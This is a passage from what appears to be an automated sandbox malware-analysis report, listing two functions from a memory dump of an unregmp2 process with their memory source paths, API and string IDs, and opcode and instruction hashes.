                  • Instruction Fuzzy Hash: 63918F70F0021A9BDF24DE69C880ABEB7A5FFC4760F54462BE855A72C0E734E9418B70
                  Function 04D09126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: 4eb41cea5db53c6f9363fffc6b3616f6d1538670ad2b03291c7ebd94fdbfbfd9
                  • Instruction ID: d4d2563001fdb1d81d9aab1064abe8dd7acaaaa7044738c6006ba571e7525ede
                  • Opcode Fuzzy Hash: 4eb41cea5db53c6f9363fffc6b3616f6d1538670ad2b03291c7ebd94fdbfbfd9
                  • Instruction Fuzzy Hash: FA811DB1E012699BDB31DF54CC54BEEB7B4AB08714F0041DAE919B7290E730AE84CF61
                  Function 04D8CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                  Download Yara Rule
                  APIs
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 04D8CFBD
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: CallFilterFunc@8
                  • String ID: @$@4_w@4_w
                  • API String ID: 4062629308-713214301
                  • Opcode ID: 792815fb81607845b15415c34010a155a3900aa7ad7d76e883fdc6bf965b1aa9
                  • Instruction ID: e5cfa1431b77991a0ad0cc39bbde640d5737a2f9b86533d64427846aefe6e09f
                  • Opcode Fuzzy Hash: 792815fb81607845b15415c34010a155a3900aa7ad7d76e883fdc6bf965b1aa9
                  • Instruction Fuzzy Hash: DD416F71A00254EFEB21AFA5D840A7EBBB9FF45B04F01402EED15EB2A1D734E905DB61